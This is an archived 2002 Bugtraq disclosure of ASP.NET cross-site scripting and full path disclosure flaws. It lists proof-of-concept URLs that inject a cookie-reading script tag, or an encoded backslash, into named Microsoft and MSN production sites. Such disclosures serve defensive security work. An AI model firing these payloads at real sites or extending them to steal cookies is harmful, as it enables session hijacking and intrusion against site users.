Bugtraq mailing list archives

Microsoft .NET faults

From: "Johannes Westerink" <jwesterink () daxis nl>
Date: Mon, 4 Feb 2002 22:40:31 +0100

Microsoft ASP.NET Cross Site Scripting and Full Path Disclosure vulnerability

This is based on Microsoft .NET.




Examples how it can be exploited:

Cross Site Scripting:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://ulogin.bcentral.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://www.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://my.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://dotnet.microsoft.com/<script>alert(document.cookie)</script>.aspx
http://terraserver.microsoft.net/<script>alert(document.cookie)</script>.aspx
http://support.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://office.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://communities.microsoft.com/~/<script>alert(document.cookie)</script>.aspx
http://uddi.microsoft.com/~/<script>alert(document.cookie)</script>.aspx



This vulnerability exists on older .NET versions:

Full Path Disclosure vulnerability:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://terraserver.microsoft.com/a%5c.aspx
http://uddi.microsoft.com/a%5c.aspx



I've posted via Microsoft security subscribe website  that there is a vulnerability and how to exploit on one of their 
site long times ago (1/2 year ago), and haven't got any response of them.


-- Johannes Westerink

Current thread:

Microsoft .NET faults Johannes Westerink (Feb 04)